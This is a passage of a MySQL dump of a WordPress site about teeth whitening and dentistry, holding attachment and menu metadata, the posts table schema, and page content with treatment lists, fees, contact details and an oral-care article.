options?'),(433,196,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(434,196,'_edit_last','1'),(435,196,'_edit_lock','1557319987:1'),(436,197,'_wp_attached_file','2019/05/cosmetic-dental-treatments.jpg'),(437,197,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:38:\"2019/05/cosmetic-dental-treatments.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"cosmetic-dental-treatments-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"cosmetic-dental-treatments-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"cosmetic-dental-treatments-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:38:\"cosmetic-dental-treatments-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(438,196,'_thumbnail_id','197'),(440,199,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(441,199,'_menu_item_type','post_type'),(442,199,'_menu_item_menu_item_parent','95'),(443,199,'_menu_item_object_id','196'),(444,199,'_menu_item_object','post'),(445,199,'_menu_item_target',''),(446,199,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(447,199,'_menu_item_xfn',''),(448,199,'_menu_item_url',''),(450,201,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(451,201,'_edit_last','1'),(452,201,'_edit_lock','1575480033:1'),(453,201,'_wp_page_template','default'),(454,202,'_wpb_vc_js_status','false'),(455,202,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(456,202,'_menu_item_type','post_type'),(457,202,'_menu_item_menu_item_parent','0'),(458,202,'_menu_item_object_id','201'),(459,202,'_menu_item_object','page'),(460,202,'_menu_item_target',''),(461,202,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(462,202,'_menu_item_xfn',''),(463,202,'_menu_item_url',''),(464,201,'_wpb_vc_js_status','false'),(465,201,'_thumbnail_id','181'),(467,207,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(468,207,'_edit_last','1'),(469,207,'_edit_lock','1622028423:1'),(470,208,'_wp_attached_file','2020/09/veneers-the-hollywood-smile.jpg.jpg'),(471,208,'_wp_attachment_image_alt','Hollywood smile'),(475,207,'_thumbnail_id','208'),(476,218,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(477,218,'_edit_lock','1622028801:1'),(479,218,'_thumbnail_id','145'),(480,220,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(481,220,'_menu_item_type','post_type'),(482,220,'_menu_item_menu_item_parent','140'),(483,220,'_menu_item_object_id','218'),(484,220,'_menu_item_object','post'),(485,220,'_menu_item_target',''),(486,220,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(487,220,'_menu_item_xfn',''),(488,220,'_menu_item_url',''),(490,221,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(491,221,'_edit_lock','1622197740:1'),(492,44,'_wp_attachment_image_alt','correct your teeth'),(494,221,'_thumbnail_id','44'),(497,227,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(498,227,'_menu_item_type','post_type'),(499,227,'_menu_item_menu_item_parent','140'),(500,227,'_menu_item_object_id','221'),(501,227,'_menu_item_object','post'),(502,227,'_menu_item_target',''),(503,227,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(504,227,'_menu_item_xfn',''),(505,227,'_menu_item_url',''),(514,234,'_edit_last','1'),(515,234,'_edit_lock','1626774146:1'),(516,235,'_wp_attached_file','2021/07/teeth-5536858_1920.jpg'),(517,235,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1280;s:4:\"file\";s:30:\"2021/07/teeth-5536858_1920.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"teeth-5536858_1920-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"teeth-5536858_1920-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"teeth-5536858_1920-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"teeth-5536858_1920-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"teeth-5536858_1920-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:30:\"teeth-5536858_1920-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"10\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 6D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"90\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(518,235,'_wp_attachment_image_alt','tooth pain'),(519,237,'_wp_attached_file','2021/07/pexels-cedric-fauntleroy-4270088-scaled.jpg'),(520,237,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1707;s:6:\"height\";i:2560;s:4:\"file\";s:51:\"2021/07/pexels-cedric-fauntleroy-4270088-scaled.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"pexels-cedric-fauntleroy-4270088-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:45:\"pexels-cedric-fauntleroy-4270088-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"pexels-cedric-fauntleroy-4270088-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"pexels-cedric-fauntleroy-4270088-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:46:\"pexels-cedric-fauntleroy-4270088-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:46:\"pexels-cedric-fauntleroy-4270088-1366x2048.jpg\";s:5:\"width\";i:1366;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"healing-touch-homepage-thumb\";a:4:{s:4:\"file\";s:44:\"pexels-cedric-fauntleroy-4270088-240x145.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:36:\"pexels-cedric-fauntleroy-4270088.jpg\";}'),(521,237,'_wp_attachment_image_alt','tooth pain');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_posts`
--
DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
`post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content` longtext NOT NULL,
`post_title` text NOT NULL,
`post_excerpt` text NOT NULL,
`post_status` varchar(20) NOT NULL DEFAULT 'publish',
`comment_status` varchar(20) NOT NULL DEFAULT 'open',
`ping_status` varchar(20) NOT NULL DEFAULT 'open',
`post_password` varchar(255) NOT NULL DEFAULT '',
`post_name` varchar(200) NOT NULL DEFAULT '',
`to_ping` text NOT NULL,
`pinged` text NOT NULL,
`post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content_filtered` longtext NOT NULL,
`post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`guid` varchar(255) NOT NULL DEFAULT '',
`menu_order` int(11) NOT NULL DEFAULT 0,
`post_type` varchar(20) NOT NULL DEFAULT 'post',
`post_mime_type` varchar(100) NOT NULL DEFAULT '',
`comment_count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`ID`),
KEY `post_name` (`post_name`(191)),
KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
KEY `post_parent` (`post_parent`),
KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=249 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_posts`
--
LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (5,1,'2018-01-26 12:15:03','2018-01-26 12:15:03','<h2><a href=\"/\"><img class=\"alignnone size-full wp-image-190\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2019/02/iStock-936967024.jpg\" alt=\"What are your teeth whitening options?\" width=\"1254\" height=\"836\" /></a></h2>\r\n<h2>London & Hertfordshire dentists offer the highest quality dental treatments and facial aesthetics</h2>\r\nYour dentist should be skilled and experienced doctors knowledgeable in the latest dental procedures.\r\n\r\nTreatments typically offered include teeth whitening, porcelain veneers, lumineers, crowns and bridges, dental implants, Invisalign and orthodontic procedures.\r\n\r\n<em><strong>Teeth Whitening Products\' aim is dental health for you and your family.</strong></em>\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us for more information</a>.</blockquote>\r\n<h2>Get a Beautiful Smile with Beautiful Teeth</h2>\r\nThis means giving you regular dental advice and screening and helping you to understand how to care for your own mouth.\r\n\r\nOur aim is to provide good quality dentistry using the latest technology and materials available, but also to offer relaxed and friendly surroundings and minimum discomfort.\r\n\r\nThe team operates a preventive approach and our goal is to make your mouth comfortable and efficient with the best aesthetic result that is practicable.\r\n\r\nYour local practice should offer a full range of dental treatments, including general density, and other specialised treatments such as:\r\n<ul>\r\n <li>Restorative (crown and bridges)</li>\r\n <li>Cosmetic (including veneers & tooth whitening)</li>\r\n <li>Preventative (orthodontic)</li>\r\n</ul>\r\n<h2><a href=\"https://www.hockerilldental.com/our-practice\" target=\"_blank\" rel=\"noopener\">Leading cosmetic dentists in Hertfordshire</a></h2>\r\nHockerill Dental is based in Bishops\' Stortford and has been operating since 1960. They provide all standard dental treatments, as well as offering cosmetic dentistry such as porcelain veneers.\r\n\r\nAs well as this, they accept NHS and private patients and offer a nervous patient treatment for those who are anxious.\r\n\r\nDon\'t worry about visiting the dentist, as the Hockerill Dental team can help you overcome this fear, whilst ensuring your oral health is at its best. Call <a href=\"tel:01279652400\">01279 652400</a> for more information.\r\n<blockquote><a href=\"https://teethwhiteningproduct.co.uk/dentists/\">Click here to see a list of other dentists</a>.</blockquote>','Feel confident with your smile using teeth whitening treatments','','publish','closed','closed','','teeth-whitening','','','2019-02-18 16:20:00','2019-02-18 16:20:00','',0,'https://teethwhiteningproduct.co.uk/?page_id=5',0,'page','',0),(6,1,'2018-01-26 12:14:59','2018-01-26 12:14:59','','teeth whitening','','inherit','closed','closed','','5-revision-v1','','','2018-01-26 12:14:59','2018-01-26 12:14:59','',5,'https://teethwhiteningproduct.co.uk/2018/01/26/5-revision-v1/',0,'revision','',0),(7,1,'2018-01-26 12:16:14','2018-01-26 12:16:14','Our highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available.\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large\r\ndental bills.\r\n\r\nA wide range of treatments are available which include.\r\n\r\n► Cosmetic dentistry\r\n► Teeth Whitening\r\n► Orthodontic\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontic\r\n► Endodontic','home kits','','publish','closed','closed','','home-kits','','','2018-01-30 08:30:51','2018-01-30 08:30:51','',0,'https://teethwhiteningproduct.co.uk/?page_id=7',0,'page','',0),(8,1,'2018-01-26 12:16:14','2018-01-26 12:16:14','','home kits','','inherit','closed','closed','','7-revision-v1','','','2018-01-26 12:16:14','2018-01-26 12:16:14','',7,'https://teethwhiteningproduct.co.uk/2018/01/26/7-revision-v1/',0,'revision','',0),(9,1,'2018-01-26 12:16:49','2018-01-26 12:16:49','','Reviews','','publish','closed','closed','','reviews','','','2018-01-26 12:16:49','2018-01-26 12:16:49','',0,'https://teethwhiteningproduct.co.uk/?page_id=9',0,'page','',0),(10,1,'2018-01-26 12:16:49','2018-01-26 12:16:49','','Reviews','','inherit','closed','closed','','9-revision-v1','','','2018-01-26 12:16:49','2018-01-26 12:16:49','',9,'https://teethwhiteningproduct.co.uk/2018/01/26/9-revision-v1/',0,'revision','',0),(11,1,'2018-01-26 12:16:58','2018-01-26 12:16:58','Every patient is different and hence each patient\'s fees will reflect their individual needs and sometimes the price depends on which material is used. You will be given a personal estimate for any treatment required after your examination, and always given a choice when different treatments are available at different costs. Below are some examples of our fees :\r\n<div align=\"justify\">\r\n<ul>\r\n <li>Initial consultation (new patient)......................................£40</li>\r\n <li>Regular examination........................................................£30</li>\r\n <li>Simple scale and polish..................................................£35</li>\r\n <li>White filling.......................................................from.........£65</li>\r\n <li>Simple extraction.............................................from.........£65</li>\r\n <li>Crown................................................................from.......£350</li>\r\n <li>Teeth whitening................................................from.......£300</li>\r\n <li>Partial denture..................................................from.......£260</li>\r\n</ul>\r\n</div>','Shop','','publish','closed','closed','','shop','','','2018-01-30 08:01:59','2018-01-30 08:01:59','',0,'https://teethwhiteningproduct.co.uk/?page_id=11',0,'page','',0),(12,1,'2018-01-26 12:16:58','2018-01-26 12:16:58','','Shop','','inherit','closed','closed','','11-revision-v1','','','2018-01-26 12:16:58','2018-01-26 12:16:58','',11,'https://teethwhiteningproduct.co.uk/2018/01/26/11-revision-v1/',0,'revision','',0),(13,1,'2018-01-26 12:17:06','2018-01-26 12:17:06','<a href=\"/\"><img class=\"alignnone wp-image-85 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/teeth-check-Copy.jpg\" alt=\"leading dentistry london essex\" width=\"872\" height=\"466\" /></a>\r\n<h2>Find out how we can help you</h2>\r\n<div id=\"synopsis\">\r\n<div align=\"center\">After your consultation, where we listen to your needs and concerns, we will present you with all the treatment options available and offer our advice. It is important to us that you understand every stage of your treatment and we encourage you to ask questions.</div>\r\n</div>\r\n<div align=\"center\"></div>\r\n<strong>We pride ourselves in providing high quality general and family dental care. Regular check-ups are key to our preventive plan to help keep your teeth and gums healthy for life.</strong>\r\n\r\n<strong>We carry out all aspects of general dentistry, including cleaning, fillings, root canal therapy, crowns, veneers, dentures and extractions. We use the best materials available and the latest techniques in a gentle and caring way to help you achieve a healthy, attractive smile.</strong>\r\n<blockquote><em>If you\'re looking for specialist periodontics we recommend <strong>Al-Fa Perio Clinic in Essex</strong>. Their team of highly skilled periodontists offer a range of treatments including laser gum dentistry and <a href=\"https://www.al-faperio.co.uk/dental-implants\" target=\"_blank\" rel=\"noopener\">titanium dental implants</a>.</em></blockquote>\r\n<div class=\"entry-content\">\r\n\r\nOur highly trained staff are happy to discuss any anxieties you may have or offer advice on treatments available. <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">See our contact page.</a>\r\n\r\nWe offer a preventative dental care program which is payable monthly, thus taking the worry out of facing large dental bills.\r\n\r\n<strong>A wide range of treatments are available which include.</strong>\r\n\r\n► Cosmetic dentistry\r\n► <a href=\"https://teethwhiteningproduct.co.uk/teeth-whitening/\">Teeth Whitening</a>\r\n► Orthodontic\r\n\r\n► <a href=\"https://teethwhiteningproduct.co.uk/2018/01/30/preventive-dentistry/\">Preventative dentistry</a>\r\n► Dental Implants\r\n► Crown and Bridges\r\n► Prosthetic\r\n► Periodontic\r\n► Endodontic\r\n\r\n</div>\r\n<em>We follow strict hygiene and infection control procedures to ensure the safety of our patients.</em>\r\n\r\n<strong>Got questions? <a href=\"https://teethwhiteningproduct.co.uk/contact-us/\">Contact us today</a></strong>','What dental treatments are available?','','publish','closed','closed','','dentists','','','2018-04-17 13:22:00','2018-04-17 13:22:00','',0,'https://teethwhiteningproduct.co.uk/?page_id=13',0,'page','',0),(14,1,'2018-01-26 12:17:06','2018-01-26 12:17:06','','Dentists','','inherit','closed','closed','','13-revision-v1','','','2018-01-26 12:17:06','2018-01-26 12:17:06','',13,'https://teethwhiteningproduct.co.uk/2018/01/26/13-revision-v1/',0,'revision','',0),(15,1,'2018-01-26 12:17:15','2018-01-26 12:17:15','<img class=\"aligncenter wp-image-85 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/teeth-check-Copy.jpg\" alt=\"\" width=\"872\" height=\"466\" />Here at teeth whitening products we combine over 25 years of professional experience together with the latest technology and treatment methods to provide you with the very best care in modern, comfortable surroundings.\r\n\r\nWe work in a relaxed but professional manner, doing our utmost to deliver an excellent service to our patients and to relieve any worries about visiting the dentist.','About Us','','publish','closed','closed','','about-us','','','2018-01-30 08:14:05','2018-01-30 08:14:05','',0,'https://teethwhiteningproduct.co.uk/?page_id=15',0,'page','',0),(16,1,'2018-01-26 12:17:15','2018-01-26 12:17:15','','About Us','','inherit','closed','closed','','15-revision-v1','','','2018-01-26 12:17:15','2018-01-26 12:17:15','',15,'https://teethwhiteningproduct.co.uk/2018/01/26/15-revision-v1/',0,'revision','',0),(17,1,'2018-01-26 12:17:27','2018-01-26 12:17:27','<h1>We are extremely proud of the pioneering clinic we have built.</h1>\r\n<div class=\"site-aligner\">\r\n<div class=\"widget-column\">\r\n<div class=\"cols\">\r\n<h2>Teeth whitening studios</h2>\r\n1-7 Harley St, Marylebone, London W1G 9QD\r\n<div class=\"foot-label\">Tel :</div>\r\n<div class=\"phone-content\">020 7112 1112</div>\r\n<div class=\"clear\"></div>\r\n<div class=\"foot-label\">E-mail :</div>\r\n<div class=\"mail-content\"><a href=\"mailto:sales@teethwhiteningproduct.co.uk\">sales@teethwhiteningproduct.co.uk</a></div>\r\n</div>\r\n</div>\r\n</div>','Contact Us','','publish','closed','closed','','contact-us','','','2018-01-30 08:03:38','2018-01-30 08:03:38','',0,'https://teethwhiteningproduct.co.uk/?page_id=17',0,'page','',0),(18,1,'2018-01-26 12:17:27','2018-01-26 12:17:27','','Contact Us','','inherit','closed','closed','','17-revision-v1','','','2018-01-26 12:17:27','2018-01-26 12:17:27','',17,'https://teethwhiteningproduct.co.uk/2018/01/26/17-revision-v1/',0,'revision','',0),(19,1,'2018-01-26 12:18:03','2018-01-26 12:18:03','The dentist can help you to achieve a perfect smile but it will entail putting your hand in your pocket','Dentists','','inherit','closed','closed','','13-revision-v1','','','2018-01-26 12:18:03','2018-01-26 12:18:03','',13,'https://teethwhiteningproduct.co.uk/2018/01/26/13-revision-v1/',0,'revision','',0),(20,1,'2018-01-26 12:18:27','2018-01-26 12:18:27','<img class=\"aligncenter wp-image-42 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/dentist-chair.jpg\" alt=\"\" width=\"960\" height=\"640\" />From home remedies to professional treatments: common teeth whitening procedures used to obtain a dazzling smile.\r\n<h2><a title=\"Permanent Link to 5 Ways to Make Your Smile Look Younger\" href=\"file:///C:/Users/VC/Desktop/work/Dead%20Sites/5-ways-make-smile-look-younger/\" rel=\"bookmark\">5 Ways to Make Your Smile Look Younger</a></h2>\r\nAs we age, our smiles can start to lose their sparkle. Over time, tooth enamel starts to wear away, exposing yellowness underneath and creating gummy smiles that are more prone to staining. Here are 5 simple ways to restore your smile and keep it looking young and fresh.\r\n<ol>\r\n <li>\r\n<h2>Eat healthy food</h2>\r\n</li>\r\n</ol>\r\nSugar, as well as anything else that sticks to the teeth (such as crackers and raisins), is well known for causing tooth decay. Tooth decay discolours and destroys the teeth, so it’s well worth putting down the sugary snacks and picking up the fruit and veg.\r\n\r\nResearch has shown that the higher the amount of folic acid you consume, the lower your risk of bleeding gums, which is one of the first and most telling signs of gum disease. Foods rich in folic acid include spinach, potatoes, broccoli, fresh orange juice and wholemeal bread.\r\n\r\nAnother food that’s good for your teeth is yoghurt. Consuming just ¼ cup of yoghurt every day can decrease your chances of suffering from serious gum disease. This is due to probiotics found in the yummy dairy product that compete with cavity-creating bacteria in the mouth.\r\n<ol start=\"2\">\r\n <li>\r\n<h2>Brush and floss</h2>\r\n</li>\r\n</ol>\r\nTo keep your teeth looking young and sparkly, you should brush your teeth twice every day, for two minutes each time. On top of this, you need to floss once daily.\r\n\r\nMake sure your toothbrush has soft bristles, and brush in a vertical, short, sweeping motion rather than scrubbing horizontally.\r\n\r\nWhen flossing, slide the floss down underneath the gumline as well as between the teeth. Bacteria and plaque are prone to getting stuck between the hidden recesses, and if left there this can leave to decay and inflammation.\r\n<ol start=\"3\">\r\n <li>\r\n<h2>Visit the dentist often</h2>\r\n</li>\r\n</ol>\r\nNothing ages your mouth quite like an old filling or misaligned teeth. That is why visiting your <a href=\"http://www.bracesdublin.ie/\">Frederick Dental Clinic dentist</a> is so important. Your overall oral health should be checked at least every six months, and if your teeth have shifted significantly over the last few years, it might be time to consider orthodontics to put the youth back into your smile. When your teeth shift, your jaw does too, and this can give your face a collapsed appearance.\r\n<ol start=\"4\">\r\n <li>\r\n<h2>Rinse your mouth with water</h2>\r\n</li>\r\n</ol>\r\nJust rinsing your mouth with water after eating is a little move that can make a massive difference when it comes to decreasing staining, residue and tooth decay.\r\n<ol start=\"5\">\r\n <li>\r\n<h2>Consider teeth whitening</h2>\r\n</li>\r\n</ol>\r\nYoung-looking smiles are defined by pearly white teeth. Unfortunately, our teeth become discoloured with time due to thinning of the enamel exposing the dentin underneath.\r\n\r\nThere are several ways for you to whiten your smile, from special toothpastes to whitening kits to in-chair treatments.\r\n\r\n \r\n\r\n \r\n\r\n ','Welcome to a whiter smile','','publish','closed','closed','','welcome-to-a-whiter-smile','','','2018-11-06 12:33:10','2018-11-06 12:33:10','',0,'https://teethwhiteningproduct.co.uk/?page_id=20',0,'page','',0),(21,1,'2018-01-26 12:18:27','2018-01-26 12:18:27','From home remedies to professional treatments: common teeth whitening procedures used to obtain a dazzling smile.','Welcome to a whiter smile','','inherit','closed','closed','','20-revision-v1','','','2018-01-26 12:18:27','2018-01-26 12:18:27','',20,'https://teethwhiteningproduct.co.uk/2018/01/26/20-revision-v1/',0,'revision','',0),(22,1,'2018-01-26 12:25:38','2018-01-26 12:25:38','','1firstaidpexels-photo-271317','','inherit','open','closed','','1firstaidpexels-photo-271317','','','2018-01-26 12:25:38','2018-01-26 12:25:38','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/1firstaidpexels-photo-271317.jpeg',0,'attachment','image/jpeg',0),(23,1,'2018-01-26 12:25:39','2018-01-26 12:25:39','','563142823_1280x720','','inherit','open','closed','','563142823_1280x720','','','2018-01-26 12:25:39','2018-01-26 12:25:39','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/563142823_1280x720.jpg',0,'attachment','image/jpeg',0),(24,1,'2018-01-26 12:25:40','2018-01-26 12:25:40','','27247021692_90a8a4d76e_b','','inherit','open','closed','','27247021692_90a8a4d76e_b','','','2018-01-26 12:25:40','2018-01-26 12:25:40','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/27247021692_90a8a4d76e_b.jpg',0,'attachment','image/jpeg',0),(25,1,'2018-01-26 12:25:41','2018-01-26 12:25:41','','acupuncture legs','','inherit','open','closed','','acupuncture-legs','','','2018-01-26 12:25:41','2018-01-26 12:25:41','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/acupuncture-legs.jpg',0,'attachment','image/jpeg',0),(26,1,'2018-01-26 12:25:42','2018-01-26 12:25:42','','Booze Bar Liquor Pub Alcohol Bottles Drink','Booze Bar Liquor Pub Alcohol Bottles Drink','inherit','open','closed','','booze-bar-liquor-pub-alcohol-bottles-drink','','','2018-01-26 12:25:42','2018-01-26 12:25:42','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/Alcohol-Bottles-Drink-2687103.jpg',0,'attachment','image/jpeg',0),(27,1,'2018-01-26 12:25:43','2018-01-26 12:25:43','','alcohol-drink','','inherit','open','closed','','alcohol-drink','','','2018-01-26 12:25:43','2018-01-26 12:25:43','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/alcohol-drink.jpg',0,'attachment','image/jpeg',0),(28,1,'2018-01-26 12:25:43','2018-01-26 12:25:43','','article-2222972-15ADA09D000005DC-373_634x494','','inherit','open','closed','','article-2222972-15ada09d000005dc-373_634x494','','','2018-01-26 12:25:43','2018-01-26 12:25:43','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/article-2222972-15ADA09D000005DC-373_634x494.jpg',0,'attachment','image/jpeg',0),(29,1,'2018-01-26 12:25:44','2018-01-26 12:25:44','','baby holding hand','','inherit','open','closed','','baby-holding-hand','','','2018-01-26 12:25:44','2018-01-26 12:25:44','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/baby-holding-hand.jpg',0,'attachment','image/jpeg',0),(30,1,'2018-01-26 12:25:44','2018-01-26 12:25:44','','baby','','inherit','open','closed','','baby','','','2018-01-26 12:25:44','2018-01-26 12:25:44','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/baby.jpg',0,'attachment','image/jpeg',0),(31,1,'2018-01-26 12:25:45','2018-01-26 12:25:45','','baby-feet','','inherit','open','closed','','baby-feet','','','2018-01-26 12:25:45','2018-01-26 12:25:45','',20,'https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/baby-feet.jpg',0,'attachment','image/jpeg',0),(32,1,'2018-11-06 12:24:21','2018-11-06 12:24:21','<img class=\"aligncenter wp-image-42 size-full\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2018/01/dentist-chair.jpg\" alt=\"\" width=\"960\" height=\"640\" />From home remedies to professional treatments: common teeth whitening procedures used to obtain a dazzling smile.\n<h2><a title=\"Permanent Link to 5 Ways to Make Your Smile Look Younger\" href=\"file:///C:/Users/VC/Desktop/work/Dead%20Sites/5-ways-make-smile-look-younger/\" rel=\"bookmark\">5 Ways to Make Your Smile Look Younger</a></h2>\nAs we age, our smiles can start to lose their sparkle. Over time, tooth enamel starts to wear away, exposing yellowness underneath and creating gummy smiles that are more prone to staining. Here are 5 simple ways to restore your smile and keep it looking young and fresh.\n<ol>\n <li>\n<h2>Eat healthy food</h2>\n</li>\n</ol>\nSugar, as well as anything else that sticks to the teeth (such as crackers and raisins), is well known for causing tooth decay. Tooth decay discolours and destroys the teeth, so it’s well worth putting down the sugary snacks and picking up the fruit and veg.\n\nResearch has shown that the higher the amount of folic acid you consume, the lower your risk of bleeding gums, which is one of the first and most telling signs of gum disease. Foods rich in folic acid include spinach, potatoes, broccoli, fresh orange juice and wholemeal bread.\n\nAnother food that’s good for your teeth is yoghurt. Consuming just ¼ cup of yoghurt every day can decrease your chances of suffering from serious gum disease. This is due to probiotics found in the yummy dairy product that compete with cavity-creating bacteria in the mouth.\n<ol start=\"2\">\n <li>\n<h2>Brush and 